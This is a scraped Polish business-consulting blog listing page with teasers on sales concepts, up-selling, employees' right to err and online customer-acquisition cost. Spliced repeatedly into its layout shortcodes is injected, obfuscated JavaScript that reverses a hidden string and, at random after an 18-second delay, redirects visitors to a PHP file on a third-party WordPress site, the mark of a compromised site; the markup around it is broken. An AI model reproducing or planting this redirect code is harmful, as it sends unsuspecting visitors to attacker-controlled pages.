) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top=”150″ padding_bottom=”100″ top_shape_style=”speech-top” top_shape_size=”small” top_shape_color=”#ffffff” bottom_shape_color=”#ffffff” sidebar=”sidebar-2″]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom_1490544663194{padding-left: 20px !important;}”]

BLOG

Przeczytaj nasze artykuły

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom_1490735828338{margin-top: -40px !important;}”]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top"]

Obietnica Konceptu Sprzedażowego

[vc_separator color="custom" accent_color="#959dcb"]

Klienci odwiedzają firmy ze względu na to, jakie te są. A raczej ze względu na to, co im najpierw obiecały, a potem czy tego dotrzymały. Obietnicę składa Koncept Sprzedażowy firmy, a dotrzymuje jej Model Biznesowy. Co to jest jedno i drugie? Przewaga, Model, Koncept Każda firma jakoś działa. To działanie można opisać w uproszczony sposób, […]

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom" custom_background="#34334f" custom_text="#ffffff" size="sm"]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top"]

Prawo do błędu

[vc_separator color="custom" accent_color="#959dcb"]

Pracownik powinien zawsze mieć prawo do błędu. I trzeba mu to prawo zakomunikować, ale też respektować w praktyce. Sprowadza się to do stwierdzenia : „jeśli działałeś w interesie firmy, a przynajmniej byłeś o tym przekonany, nie spotka cię nic złego, poza wyjaśnieniem”. Dlaczego to takie ważne? Gdyż inaczej trzeba zapomnieć o inicjatywie pracowników. Dlatego należy […]

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom" custom_background="#34334f" custom_text="#ffffff" size="sm"]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top"]

Up-sell

[vc_separator color="custom" accent_color="#959dcb"]

Inaczej to próba sprzedania za więcej, ale nie przez więcej, tylko przez drożej (czyli przez sprzedaż droższego produktu o tej samej podstawowej funkcji co tańszy). To nie jest łatwe, gdyż często klienci z góry przeznaczają jakiś budżet na zakupy, a przynajmniej mają wyobrażenie, ile taki produkt powinien kosztować. Dla sprzedawcy to poważne ograniczenie, z którym […]

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom" custom_background="#34334f" custom_text="#ffffff" size="sm"]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top"]

Koszt dotarcia online

[vc_separator color="custom" accent_color="#959dcb"]

Firmy sprzedażowe żyją z tego, że zjawiają się u nich klienci, fizycznie czy wirtualnie. Zwykle to efekt poinformowania ich na różne sposoby o obietnicy, jaką im składają (której to obietnicy trzeba jednak potem dotrzymać). Jak jednak klienci mają się dowiedzieć o tej obietnicy? Trzeba im to zakomunikować, i to tak, żeby się przekonali. Czyli trzeba […]

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom" custom_background="#34334f" custom_text="#ffffff" size="sm"]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top"]

tosować">Nie widzieć, negować, nie wiedzieć, wiedzieć, rozwiązać, zastosować

[vc_separator color="custom" accent_color="#959dcb"]

Dlaczego firmy mają kłopoty? Najpierw tego nie zauważają, potem twierdzą, że to nieprawda. Potem nie rozumieją prawdziwych przyczyn, nie mogą się zdobyć na prawdzie rozwiązanie, w końcu tego rozwiązania nie doceniają, w końcu nie potrafią go zastosować. Tymczasem prawdziwe przyczyny są inne, albo robią coś gorzej niż do tej pory, albo tracą przewagę nad konkurencją, […]

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom" custom_background="#34334f" custom_text="#ffffff" size="sm"]
Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.